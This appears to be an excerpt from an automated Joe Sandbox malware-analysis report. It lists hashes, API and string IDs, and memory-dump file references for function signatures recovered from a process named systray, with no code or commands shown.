                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: b551c87aa4c9c6ce038185e3fa37dafaaa67ad50fc2dad458e2e0f9fbd58c657
                                                                  • Instruction ID: bbca032baecf18e9657a1d4caf30ba098d69fee9d05944cf9902dd0fffcfbabe
                                                                  • Opcode Fuzzy Hash: b551c87aa4c9c6ce038185e3fa37dafaaa67ad50fc2dad458e2e0f9fbd58c657
                                                                  • Instruction Fuzzy Hash: 083157766002199FDB24EE29DD50BEEB7F8EF44754F8445D9E849E3140EB30BA44CBA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: df73d2861f7f8b2d5ecd0c91781c49921331d13b1610a7153d221fba09531511
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: BC919671E002599BDF24DF69C881ABFB7E5FF44720FA4459AE855E72E0EF30A9408760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: 57db71b924a5b9006e9d5bd733bfe6fe0d87a7509a30768b14813c2cb6b33ba0
                                                                  • Instruction ID: dab5f586b69d4ccb5c2e3668451a4545ed0b997f17d69d505ade6dd8256fcb37
                                                                  • Opcode Fuzzy Hash: 57db71b924a5b9006e9d5bd733bfe6fe0d87a7509a30768b14813c2cb6b33ba0
                                                                  • Instruction Fuzzy Hash: B8811BB1D012699BDB35DF54CD45BEAB7B8AF08714F0041DAA919B7250E770AE84CFA0
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 04B5CFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Dw@4Dw
                                                                  • API String ID: 4062629308-3936743583
                                                                  • Opcode ID: e9d7786f88e5ae8fe42f17d811009fc3e5a32603aea684acc712b1911b1fec77
                                                                  • Instruction ID: 67733658498de0cdb413d2893b705bb6baba3a6fd8e4a2da1f57918900c1e89f
                                                                  • Opcode Fuzzy Hash: e9d7786f88e5ae8fe42f17d811009fc3e5a32603aea684acc712b1911b1fec77
                                                                  • Instruction Fuzzy Hash: 8A41CE71900214DFDB219FA9D990BADFBB8FF48B14F0481AAED15DB260D734E800CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4781931793.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_48e0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9$:0=($;&5,$p|89
                                                                  • API String ID: 0-533800126
                                                                  • Opcode ID: f6665e2ec1701d8a95a60850f885a35d4fb276e81995e2f2a39c47bff9511014
                                                                  • Instruction ID: 9a2e468d707980926004b8878f3640e313616a32a512196a1a347790b81437d4
                                                                  • Opcode Fuzzy Hash: f6665e2ec1701d8a95a60850f885a35d4fb276e81995e2f2a39c47bff9511014
                                                                  • Instruction Fuzzy Hash: 08F0EC35018B844FD705AB5CC44596A77D4FBD830DF400B1EE8CACB151DA759A478B4B